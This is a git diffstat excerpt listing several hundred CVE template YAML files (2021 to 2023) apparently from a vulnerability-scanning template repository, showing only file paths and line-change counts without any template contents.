http/cves/2021/CVE-2021-39501.yaml | 1 + http/cves/2021/CVE-2021-40149.yaml | 2 ++ http/cves/2021/CVE-2021-40150.yaml | 2 ++ http/cves/2021/CVE-2021-40323.yaml | 7 ++++-- http/cves/2021/CVE-2021-40438.yaml | 5 ++-- http/cves/2021/CVE-2021-40539.yaml | 7 ++++-- http/cves/2021/CVE-2021-40542.yaml | 6 +++-- http/cves/2021/CVE-2021-40651.yaml | 7 +++++- http/cves/2021/CVE-2021-40822.yaml | 1 + http/cves/2021/CVE-2021-40868.yaml | 4 ++-- http/cves/2021/CVE-2021-40870.yaml | 8 ++++--- http/cves/2021/CVE-2021-40875.yaml | 1 + http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 6 +++-- http/cves/2021/CVE-2021-40969.yaml | 2 ++ http/cves/2021/CVE-2021-40970.yaml | 2 ++ http/cves/2021/CVE-2021-40971.yaml | 2 ++ http/cves/2021/CVE-2021-40972.yaml | 2 ++ http/cves/2021/CVE-2021-40973.yaml | 2 ++ http/cves/2021/CVE-2021-40978.yaml | 4 ++-- http/cves/2021/CVE-2021-41174.yaml | 6 +++-- http/cves/2021/CVE-2021-41192.yaml | 6 +++-- http/cves/2021/CVE-2021-41277.yaml | 5 ++-- http/cves/2021/CVE-2021-41282.yaml | 3 +++ http/cves/2021/CVE-2021-41291.yaml | 5 ++-- http/cves/2021/CVE-2021-41293.yaml | 4 ++-- http/cves/2021/CVE-2021-41349.yaml | 3 +++ http/cves/2021/CVE-2021-41432.yaml | 3 ++- http/cves/2021/CVE-2021-41467.yaml | 6 +++-- http/cves/2021/CVE-2021-41649.yaml | 6 +++-- http/cves/2021/CVE-2021-41749.yaml | 4 ++-- http/cves/2021/CVE-2021-4191.yaml | 3 +++ http/cves/2021/CVE-2021-41951.yaml | 4 ++-- http/cves/2021/CVE-2021-42013.yaml | 1 + http/cves/2021/CVE-2021-42063.yaml | 1 + http/cves/2021/CVE-2021-42237.yaml | 2 ++ http/cves/2021/CVE-2021-42565.yaml | 4 ++-- http/cves/2021/CVE-2021-42566.yaml | 4 ++-- http/cves/2021/CVE-2021-42567.yaml | 4 +++- http/cves/2021/CVE-2021-42627.yaml | 8 +++---- http/cves/2021/CVE-2021-42887.yaml | 4 +++- http/cves/2021/CVE-2021-43062.yaml | 3 +++ http/cves/2021/CVE-2021-43287.yaml | 2 ++ http/cves/2021/CVE-2021-43421.yaml | 4 ++-- http/cves/2021/CVE-2021-43496.yaml | 7 ++++-- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 3 ++- http/cves/2021/CVE-2021-43725.yaml | 2 ++ http/cves/2021/CVE-2021-43734.yaml | 5 ++-- http/cves/2021/CVE-2021-43778.yaml | 4 ++-- http/cves/2021/CVE-2021-43798.yaml | 2 ++ http/cves/2021/CVE-2021-43810.yaml | 4 ++-- http/cves/2021/CVE-2021-44077.yaml | 3 +++ http/cves/2021/CVE-2021-44138.yaml | 1 + http/cves/2021/CVE-2021-44139.yaml | 2 ++ http/cves/2021/CVE-2021-44152.yaml | 1 + http/cves/2021/CVE-2021-44228.yaml | 4 ++-- http/cves/2021/CVE-2021-44427.yaml | 4 ++-- http/cves/2021/CVE-2021-44451.yaml | 7 ++++-- http/cves/2021/CVE-2021-44515.yaml | 3 +++ http/cves/2021/CVE-2021-44528.yaml | 1 + http/cves/2021/CVE-2021-44529.yaml | 8 ++++--- http/cves/2021/CVE-2021-44848.yaml | 3 +++ http/cves/2021/CVE-2021-45043.yaml | 4 +++- http/cves/2021/CVE-2021-45046.yaml | 5 ++-- http/cves/2021/CVE-2021-45092.yaml | 5 +++- http/cves/2021/CVE-2021-45232.yaml | 4 ++-- http/cves/2021/CVE-2021-45380.yaml | 3 ++- http/cves/2021/CVE-2021-45422.yaml | 2 ++ http/cves/2021/CVE-2021-45428.yaml | 8 +++---- http/cves/2021/CVE-2021-45968.yaml | 4 ++-- http/cves/2021/CVE-2021-46005.yaml | 6 ++++- http/cves/2021/CVE-2021-46069.yaml | 5 ++-- http/cves/2021/CVE-2021-46071.yaml | 5 ++-- http/cves/2021/CVE-2021-46072.yaml | 4 ++-- http/cves/2021/CVE-2021-46107.yaml | 1 + http/cves/2021/CVE-2021-46381.yaml | 8 +++---- http/cves/2021/CVE-2021-46387.yaml | 6 +++-- http/cves/2021/CVE-2021-46417.yaml | 5 ++-- http/cves/2021/CVE-2021-46418.yaml | 9 ++++---- http/cves/2021/CVE-2021-46419.yaml | 6 ++--- http/cves/2021/CVE-2021-46422.yaml | 8 +++---- http/cves/2021/CVE-2021-46424.yaml | 1 + http/cves/2021/CVE-2021-46704.yaml | 1 + http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 3 ++- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 ++ http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 4 +++- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 5 +++- http/cves/2022/CVE-2022-0281.yaml | 1 + http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 3 ++- http/cves/2022/CVE-2022-0415.yaml | 9 ++++++-- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 ++ http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 4 ++-- http/cves/2022/CVE-2022-0533.yaml | 4 +++- http/cves/2022/CVE-2022-0597.yaml | 3 ++- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 7 ++++-- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 5 ++-- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 ++ http/cves/2022/CVE-2022-0678.yaml | 3 ++- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 4 ++-- http/cves/2022/CVE-2022-0735.yaml | 4 +++- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 4 ++-- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 4 ++-- http/cves/2022/CVE-2022-0786.yaml | 4 ++-- http/cves/2022/CVE-2022-0787.yaml | 4 ++-- http/cves/2022/CVE-2022-0814.yaml | 2 ++ http/cves/2022/CVE-2022-0817.yaml | 4 ++-- http/cves/2022/CVE-2022-0824.yaml | 3 +++ http/cves/2022/CVE-2022-0826.yaml | 5 ++-- http/cves/2022/CVE-2022-0827.yaml | 4 ++-- http/cves/2022/CVE-2022-0846.yaml | 4 ++-- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 3 +++ http/cves/2022/CVE-2022-0899.yaml | 1 + http/cves/2022/CVE-2022-0928.yaml | 6 ++++- http/cves/2022/CVE-2022-0949.yaml | 4 ++-- http/cves/2022/CVE-2022-0954.yaml | 4 +++- http/cves/2022/CVE-2022-0963.yaml | 4 +++- http/cves/2022/CVE-2022-0968.yaml | 2 ++ http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 4 ++-- http/cves/2022/CVE-2022-1040.yaml | 2 ++ http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 4 ++-- http/cves/2022/CVE-2022-1058.yaml | 2 ++ http/cves/2022/CVE-2022-1119.yaml | 4 ++-- http/cves/2022/CVE-2022-1162.yaml | 2 ++ http/cves/2022/CVE-2022-1170.yaml | 2 ++ http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 6 ++--- http/cves/2022/CVE-2022-1386.yaml | 4 ++-- http/cves/2022/CVE-2022-1388.yaml | 2 ++ http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 6 +++-- http/cves/2022/CVE-2022-1439.yaml | 3 ++- http/cves/2022/CVE-2022-1442.yaml | 4 ++-- http/cves/2022/CVE-2022-1574.yaml | 4 ++-- http/cves/2022/CVE-2022-1580.yaml | 5 ++-- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 6 +++-- http/cves/2022/CVE-2022-1756.yaml | 2 ++ http/cves/2022/CVE-2022-1768.yaml | 4 ++-- http/cves/2022/CVE-2022-1815.yaml | 3 +++ http/cves/2022/CVE-2022-1903.yaml | 4 ++-- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 6 +++-- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 3 +++ http/cves/2022/CVE-2022-21500.yaml | 2 ++ http/cves/2022/CVE-2022-21587.yaml | 7 ++++-- http/cves/2022/CVE-2022-21661.yaml | 5 ++-- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 1 + http/cves/2022/CVE-2022-2185.yaml | 2 ++ http/cves/2022/CVE-2022-2187.yaml | 4 ++-- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 6 +++-- http/cves/2022/CVE-2022-22536.yaml | 5 ++-- http/cves/2022/CVE-2022-22733.yaml | 5 ++-- http/cves/2022/CVE-2022-2290.yaml | 2 ++ http/cves/2022/CVE-2022-22947.yaml | 4 ++-- http/cves/2022/CVE-2022-22954.yaml | 1 + http/cves/2022/CVE-2022-22972.yaml | 6 +++-- http/cves/2022/CVE-2022-23102.yaml | 2 ++ http/cves/2022/CVE-2022-23131.yaml | 6 +++-- http/cves/2022/CVE-2022-23134.yaml | 7 ++++-- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 5 ++-- http/cves/2022/CVE-2022-23348.yaml | 1 + http/cves/2022/CVE-2022-23544.yaml | 4 ++-- http/cves/2022/CVE-2022-2376.yaml | 4 ++-- http/cves/2022/CVE-2022-23779.yaml | 2 ++ http/cves/2022/CVE-2022-23808.yaml | 7 ++++-- http/cves/2022/CVE-2022-2383.yaml | 7 +++--- http/cves/2022/CVE-2022-23854.yaml | 1 + http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 5 ++-- http/cves/2022/CVE-2022-24124.yaml | 6 +++-- http/cves/2022/CVE-2022-2414.yaml | 1 + http/cves/2022/CVE-2022-24181.yaml | 1 + http/cves/2022/CVE-2022-24260.yaml | 6 +++-- http/cves/2022/CVE-2022-24264.yaml | 4 ++-- http/cves/2022/CVE-2022-24266.yaml | 4 ++-- http/cves/2022/CVE-2022-24288.yaml | 2 ++ http/cves/2022/CVE-2022-24384.yaml | 3 ++- http/cves/2022/CVE-2022-24627.yaml | 3 ++- http/cves/2022/CVE-2022-24681.yaml | 3 +++ http/cves/2022/CVE-2022-24716.yaml | 2 ++ http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 6 ++--- http/cves/2022/CVE-2022-2487.yaml | 2 ++ http/cves/2022/CVE-2022-2488.yaml | 2 ++ http/cves/2022/CVE-2022-24899.yaml | 2 ++ http/cves/2022/CVE-2022-24900.yaml | 3 ++- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 3 +++ http/cves/2022/CVE-2022-25149.yaml | 7 ++++-- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 3 ++- http/cves/2022/CVE-2022-2535.yaml | 2 ++ http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 4 +++- http/cves/2022/CVE-2022-25487.yaml | 5 ++-- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 4 ++-- http/cves/2022/CVE-2022-25568.yaml | 7 ++++-- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 3 ++- http/cves/2022/CVE-2022-26138.yaml | 4 ++-- http/cves/2022/CVE-2022-26148.yaml | 1 + http/cves/2022/CVE-2022-26233.yaml | 5 ++-- http/cves/2022/CVE-2022-2627.yaml | 6 +++-- http/cves/2022/CVE-2022-26352.yaml | 7 ++++-- http/cves/2022/CVE-2022-26564.yaml | 4 +++- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 4 ++-- http/cves/2022/CVE-2022-2733.yaml | 2 ++ http/cves/2022/CVE-2022-2756.yaml | 2 ++ http/cves/2022/CVE-2022-27593.yaml | 2 ++ http/cves/2022/CVE-2022-27926.yaml | 7 ++++-- http/cves/2022/CVE-2022-28023.yaml | 4 ++-- http/cves/2022/CVE-2022-28032.yaml | 4 ++-- http/cves/2022/CVE-2022-28079.yaml | 4 ++-- http/cves/2022/CVE-2022-28080.yaml | 4 ++-- http/cves/2022/CVE-2022-28117.yaml | 5 ++-- http/cves/2022/CVE-2022-28219.yaml | 6 +++-- http/cves/2022/CVE-2022-28363.yaml | 7 ++++-- http/cves/2022/CVE-2022-28365.yaml | 7 ++++-- http/cves/2022/CVE-2022-2863.yaml | 4 ++-- http/cves/2022/CVE-2022-28955.yaml | 1 + http/cves/2022/CVE-2022-29004.yaml | 4 ++-- http/cves/2022/CVE-2022-29005.yaml | 4 ++-- http/cves/2022/CVE-2022-29006.yaml | 4 ++-- http/cves/2022/CVE-2022-29007.yaml | 4 ++-- http/cves/2022/CVE-2022-29009.yaml | 4 ++-- http/cves/2022/CVE-2022-29013.yaml | 8 +++---- http/cves/2022/CVE-2022-29014.yaml | 4 ++-- http/cves/2022/CVE-2022-29078.yaml | 4 ++-- http/cves/2022/CVE-2022-29153.yaml | 2 ++ http/cves/2022/CVE-2022-29272.yaml | 3 +++ http/cves/2022/CVE-2022-29298.yaml | 1 + http/cves/2022/CVE-2022-29303.yaml | 1 + http/cves/2022/CVE-2022-29349.yaml | 5 ++-- http/cves/2022/CVE-2022-29464.yaml | 2 ++ http/cves/2022/CVE-2022-29548.yaml | 6 +++-- http/cves/2022/CVE-2022-29775.yaml | 5 ++-- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 8 +++++-- http/cves/2022/CVE-2022-30512.yaml | 4 ++-- http/cves/2022/CVE-2022-30513.yaml | 4 ++-- http/cves/2022/CVE-2022-30525.yaml | 4 ++-- http/cves/2022/CVE-2022-3062.yaml | 4 ++-- http/cves/2022/CVE-2022-30776.yaml | 1 + http/cves/2022/CVE-2022-30777.yaml | 5 +++- http/cves/2022/CVE-2022-31126.yaml | 1 + http/cves/2022/CVE-2022-31268.yaml | 2 ++ http/cves/2022/CVE-2022-31269.yaml | 6 +++-- http/cves/2022/CVE-2022-31373.yaml | 3 ++- http/cves/2022/CVE-2022-3142.yaml | 2 ++ http/cves/2022/CVE-2022-31499.yaml | 2 ++ http/cves/2022/CVE-2022-31656.yaml | 5 ++-- http/cves/2022/CVE-2022-31798.yaml | 4 +++- http/cves/2022/CVE-2022-31814.yaml | 4 ++-- http/cves/2022/CVE-2022-31845.yaml | 2 ++ http/cves/2022/CVE-2022-31846.yaml | 2 ++ http/cves/2022/CVE-2022-31847.yaml | 7 ++++-- http/cves/2022/CVE-2022-31854.yaml | 4 ++-- http/cves/2022/CVE-2022-31879.yaml | 4 ++-- http/cves/2022/CVE-2022-31976.yaml | 4 ++-- http/cves/2022/CVE-2022-31977.yaml | 4 ++-- http/cves/2022/CVE-2022-31981.yaml | 4 ++-- http/cves/2022/CVE-2022-31983.yaml | 6 +++-- http/cves/2022/CVE-2022-31984.yaml | 4 ++-- http/cves/2022/CVE-2022-32015.yaml | 4 ++-- http/cves/2022/CVE-2022-32018.yaml | 4 ++-- http/cves/2022/CVE-2022-32022.yaml | 1 + http/cves/2022/CVE-2022-32024.yaml | 1 + http/cves/2022/CVE-2022-32025.yaml | 1 + http/cves/2022/CVE-2022-32026.yaml | 1 + http/cves/2022/CVE-2022-32028.yaml | 1 + http/cves/2022/CVE-2022-32094.yaml | 5 ++-- http/cves/2022/CVE-2022-32195.yaml | 3 ++- http/cves/2022/CVE-2022-32409.yaml | 3 ++- http/cves/2022/CVE-2022-3242.yaml | 5 ++-- http/cves/2022/CVE-2022-32429.yaml | 4 ++-- http/cves/2022/CVE-2022-32430.yaml | 1 + http/cves/2022/CVE-2022-32444.yaml | 6 +++-- http/cves/2022/CVE-2022-32770.yaml | 7 ++++-- http/cves/2022/CVE-2022-32771.yaml | 3 ++- http/cves/2022/CVE-2022-32772.yaml | 7 ++++-- http/cves/2022/CVE-2022-33119.yaml | 5 ++-- http/cves/2022/CVE-2022-33174.yaml | 1 + http/cves/2022/CVE-2022-33891.yaml | 6 +++-- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 6 +++-- http/cves/2022/CVE-2022-34045.yaml | 4 +++- http/cves/2022/CVE-2022-34046.yaml | 4 +++- http/cves/2022/CVE-2022-34047.yaml | 2 ++ http/cves/2022/CVE-2022-34048.yaml | 2 ++ http/cves/2022/CVE-2022-34049.yaml | 2 ++ http/cves/2022/CVE-2022-34093.yaml | 6 +++-- http/cves/2022/CVE-2022-34094.yaml | 6 +++-- http/cves/2022/CVE-2022-34121.yaml | 4 ++-- http/cves/2022/CVE-2022-34328.yaml | 3 ++- http/cves/2022/CVE-2022-34576.yaml | 4 +++- http/cves/2022/CVE-2022-34590.yaml | 5 ++-- http/cves/2022/CVE-2022-34753.yaml | 1 + http/cves/2022/CVE-2022-35151.yaml | 1 + http/cves/2022/CVE-2022-35405.yaml | 2 ++ http/cves/2022/CVE-2022-35413.yaml | 2 ++ http/cves/2022/CVE-2022-35416.yaml | 4 ++-- http/cves/2022/CVE-2022-35493.yaml | 5 ++-- http/cves/2022/CVE-2022-35653.yaml | 6 +++-- http/cves/2022/CVE-2022-3578.yaml | 4 ++-- http/cves/2022/CVE-2022-35914.yaml | 2 ++ http/cves/2022/CVE-2022-36446.yaml | 2 ++ http/cves/2022/CVE-2022-36537.yaml | 2 ++ http/cves/2022/CVE-2022-36553.yaml | 4 ++-- http/cves/2022/CVE-2022-36642.yaml | 2 ++ http/cves/2022/CVE-2022-36804.yaml | 4 ++-- http/cves/2022/CVE-2022-37153.yaml | 1 + http/cves/2022/CVE-2022-37190.yaml | 4 ++-- http/cves/2022/CVE-2022-37299.yaml | 4 ++-- http/cves/2022/CVE-2022-3768.yaml | 4 ++-- http/cves/2022/CVE-2022-38131.yaml | 5 ++-- http/cves/2022/CVE-2022-38463.yaml | 2 ++ http/cves/2022/CVE-2022-38553.yaml | 6 +++-- http/cves/2022/CVE-2022-38637.yaml | 1 + http/cves/2022/CVE-2022-38794.yaml | 7 ++++-- http/cves/2022/CVE-2022-38817.yaml | 7 ++++-- http/cves/2022/CVE-2022-38870.yaml | 6 +++-- http/cves/2022/CVE-2022-39048.yaml | 6 +++-- http/cves/2022/CVE-2022-39195.yaml | 3 ++- http/cves/2022/CVE-2022-3980.yaml | 5 ++-- http/cves/2022/CVE-2022-3982.yaml | 5 ++-- http/cves/2022/CVE-2022-39952.yaml | 2 ++ http/cves/2022/CVE-2022-39960.yaml | 4 ++-- http/cves/2022/CVE-2022-39986.yaml | 1 + http/cves/2022/CVE-2022-40022.yaml | 8 +++---- http/cves/2022/CVE-2022-40032.yaml | 4 ++-- http/cves/2022/CVE-2022-40047.yaml | 1 + http/cves/2022/CVE-2022-40083.yaml | 4 ++-- http/cves/2022/CVE-2022-40127.yaml | 6 +++-- http/cves/2022/CVE-2022-4049.yaml | 2 ++ http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 ++ http/cves/2022/CVE-2022-4059.yaml | 7 ++++-- http/cves/2022/CVE-2022-4063.yaml | 4 ++-- http/cves/2022/CVE-2022-40734.yaml | 6 +++-- http/cves/2022/CVE-2022-40843.yaml | 8 +++---- http/cves/2022/CVE-2022-40879.yaml | 5 ++-- http/cves/2022/CVE-2022-40881.yaml | 10 ++++---- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-41412.yaml | 6 ++--- http/cves/2022/CVE-2022-41441.yaml | 1 + http/cves/2022/CVE-2022-41473.yaml | 3 ++- http/cves/2022/CVE-2022-42094.yaml | 1 + http/cves/2022/CVE-2022-42096.yaml | 5 ++-- http/cves/2022/CVE-2022-42233.yaml | 1 + http/cves/2022/CVE-2022-42746.yaml | 1 + http/cves/2022/CVE-2022-42747.yaml | 1 + http/cves/2022/CVE-2022-42748.yaml | 5 ++-- http/cves/2022/CVE-2022-42749.yaml | 1 + http/cves/2022/CVE-2022-4295.yaml | 7 ++++-- http/cves/2022/CVE-2022-43014.yaml | 6 +++-- http/cves/2022/CVE-2022-43015.yaml | 6 +++-- http/cves/2022/CVE-2022-43016.yaml | 2 ++ http/cves/2022/CVE-2022-43017.yaml | 2 ++ http/cves/2022/CVE-2022-43018.yaml | 9 ++++++-- http/cves/2022/CVE-2022-4305.yaml | 6 +++-- http/cves/2022/CVE-2022-43164.yaml | 1 + http/cves/2022/CVE-2022-43165.yaml | 1 + http/cves/2022/CVE-2022-43166.yaml | 2 ++ http/cves/2022/CVE-2022-43167.yaml | 1 + http/cves/2022/CVE-2022-43169.yaml | 6 +++-- http/cves/2022/CVE-2022-43170.yaml | 6 +++-- http/cves/2022/CVE-2022-43185.yaml | 2 ++ http/cves/2022/CVE-2022-4321.yaml | 2 ++ http/cves/2022/CVE-2022-43769.yaml | 1 + http/cves/2022/CVE-2022-44290.yaml | 4 ++-- http/cves/2022/CVE-2022-4447.yaml | 6 +++-- http/cves/2022/CVE-2022-44877.yaml | 2 ++ http/cves/2022/CVE-2022-44944.yaml | 1 + http/cves/2022/CVE-2022-44946.yaml | 1 + http/cves/2022/CVE-2022-44947.yaml | 1 + http/cves/2022/CVE-2022-44948.yaml | 4 +++- http/cves/2022/CVE-2022-44949.yaml | 2 ++ http/cves/2022/CVE-2022-44950.yaml | 2 ++ http/cves/2022/CVE-2022-44951.yaml | 4 +++- http/cves/2022/CVE-2022-44952.yaml | 2 ++ http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 5 ++-- http/cves/2022/CVE-2022-45365.yaml | 2 ++ http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 3 ++- http/cves/2022/CVE-2022-45933.yaml | 6 +++-- http/cves/2022/CVE-2022-46020.yaml | 4 ++-- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 ++ http/cves/2022/CVE-2022-46381.yaml | 1 + http/cves/2022/CVE-2022-46463.yaml | 1 + http/cves/2022/CVE-2022-46888.yaml | 7 ++++-- http/cves/2022/CVE-2022-46934.yaml | 5 ++-- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 4 ++-- http/cves/2022/CVE-2022-47615.yaml | 6 +++-- http/cves/2022/CVE-2022-47945.yaml | 6 +++-- http/cves/2022/CVE-2022-47966.yaml | 2 ++ http/cves/2022/CVE-2022-47986.yaml | 10 ++++---- http/cves/2022/CVE-2022-48012.yaml | 2 ++ http/cves/2022/CVE-2022-48165.yaml | 1 + http/cves/2022/CVE-2022-48197.yaml | 5 ++-- http/cves/2022/CVE-2022-4897.yaml | 6 +++-- http/cves/2023/CVE-2023-0099.yaml | 8 ++++--- http/cves/2023/CVE-2023-0126.yaml | 10 ++++---- http/cves/2023/CVE-2023-0159.yaml | 8 ++++--- http/cves/2023/CVE-2023-0236.yaml | 5 +++- http/cves/2023/CVE-2023-0297.yaml | 6 +++-- http/cves/2023/CVE-2023-0334.yaml | 6 +++-- http/cves/2023/CVE-2023-0448.yaml | 8 +++++-- http/cves/2023/CVE-2023-0514.yaml | 4 ++-- http/cves/2023/CVE-2023-0527.yaml | 4 ++-- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 6 +++-- http/cves/2023/CVE-2023-0602.yaml | 4 ++-- http/cves/2023/CVE-2023-0630.yaml | 4 ++-- http/cves/2023/CVE-2023-0669.yaml | 6 +++-- http/cves/2023/CVE-2023-0678.yaml | 3 +++ http/cves/2023/CVE-2023-0900.yaml | 6 +++-- http/cves/2023/CVE-2023-0942.yaml | 4 ++-- http/cves/2023/CVE-2023-0947.yaml | 5 ++-- http/cves/2023/CVE-2023-0948.yaml | 4 ++-- http/cves/2023/CVE-2023-0968.yaml | 4 ++-- http/cves/2023/CVE-2023-1020.yaml | 4 ++-- http/cves/2023/CVE-2023-1080.yaml | 4 ++-- http/cves/2023/CVE-2023-1177.yaml | 6 +++-- http/cves/2023/CVE-2023-1263.yaml | 2 ++ http/cves/2023/CVE-2023-1362.yaml | 4 ++-- http/cves/2023/CVE-2023-1408.yaml | 2 ++ http/cves/2023/CVE-2023-1454.yaml | 1 + http/cves/2023/CVE-2023-1496.yaml | 4 ++-- http/cves/2023/CVE-2023-1546.yaml | 4 ++-- http/cves/2023/CVE-2023-1671.yaml | 5 ++-- http/cves/2023/CVE-2023-1698.yaml | 5 ++-- http/cves/2023/CVE-2023-1719.yaml | 5 ++-- http/cves/2023/CVE-2023-1730.yaml | 4 ++-- http/cves/2023/CVE-2023-1780.yaml | 4 +++- http/cves/2023/CVE-2023-1835.yaml | 3 +++ http/cves/2023/CVE-2023-1880.yaml | 5 ++-- http/cves/2023/CVE-2023-1890.yaml | 4 ++-- http/cves/2023/CVE-2023-1892.yaml | 11 +++++---- http/cves/2023/CVE-2023-20073.yaml | 4 ++-- http/cves/2023/CVE-2023-2009.yaml | 4 ++-- http/cves/2023/CVE-2023-2023.yaml | 4 ++-- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 6 +++-- http/cves/2023/CVE-2023-20887.yaml | 5 ++-- http/cves/2023/CVE-2023-20888.yaml | 6 +++-- http/cves/2023/CVE-2023-20889.yaml | 6 +++-- http/cves/2023/CVE-2023-2122.yaml | 4 ++-- http/cves/2023/CVE-2023-2130.yaml | 4 ++-- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 6 +++-- http/cves/2023/CVE-2023-2224.yaml | 4 ++-- http/cves/2023/CVE-2023-2227.yaml | 4 +++- http/cves/2023/CVE-2023-22432.yaml | 5 ++-- http/cves/2023/CVE-2023-22463.yaml | 4 ++-- http/cves/2023/CVE-2023-22478.yaml | 4 ++-- http/cves/2023/CVE-2023-22480.yaml | 4 ++-- http/cves/2023/CVE-2023-22515.yaml | 5 ++-- http/cves/2023/CVE-2023-22518.yaml | 5 ++-- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 7 +++--- http/cves/2023/CVE-2023-22620.yaml | 6 +++-- http/cves/2023/CVE-2023-2272.yaml | 4 ++-- http/cves/2023/CVE-2023-22897.yaml | 7 ++++-- http/cves/2023/CVE-2023-23161.yaml | 4 ++-- http/cves/2023/CVE-2023-23333.yaml | 4 ++-- http/cves/2023/CVE-2023-23488.yaml | 8 +++++-- http/cves/2023/CVE-2023-23489.yaml | 4 ++-- http/cves/2023/CVE-2023-23491.yaml | 6 +++-- http/cves/2023/CVE-2023-23492.yaml | 6 +++-- http/cves/2023/CVE-2023-2356.yaml | 5 ++-- http/cves/2023/CVE-2023-23752.yaml | 5 ++-- http/cves/2023/CVE-2023-24044.yaml | 5 ++-- http/cves/2023/CVE-2023-24243.yaml | 4 ++-- http/cves/2023/CVE-2023-24278.yaml | 5 ++-- http/cves/2023/CVE-2023-24322.yaml | 6 +++-- http/cves/2023/CVE-2023-24488.yaml | 6 +++-- http/cves/2023/CVE-2023-24489.yaml | 6 +++-- http/cves/2023/CVE-2023-24657.yaml | 5 ++-- http/cves/2023/CVE-2023-24733.yaml | 5 ++-- http/cves/2023/CVE-2023-24735.yaml | 5 ++-- http/cves/2023/CVE-2023-24737.yaml | 5 ++-- http/cves/2023/CVE-2023-2479.yaml | 6 +++-- http/cves/2023/CVE-2023-25135.yaml | 3 ++- http/cves/2023/CVE-2023-25157.yaml | 6 +++-- http/cves/2023/CVE-2023-25194.yaml | 5 ++-- http/cves/2023/CVE-2023-25346.yaml | 6 +++-- http/cves/2023/CVE-2023-25573.yaml | 5 ++-- http/cves/2023/CVE-2023-25717.yaml | 1 + http/cves/2023/CVE-2023-26035.yaml | 5 ++-- http/cves/2023/CVE-2023-26255.yaml | 6 +++-- http/cves/2023/CVE-2023-26256.yaml | 8 +++++-- http/cves/2023/CVE-2023-26347.yaml | 5 ++-- http/cves/2023/CVE-2023-26360.yaml | 2 ++ 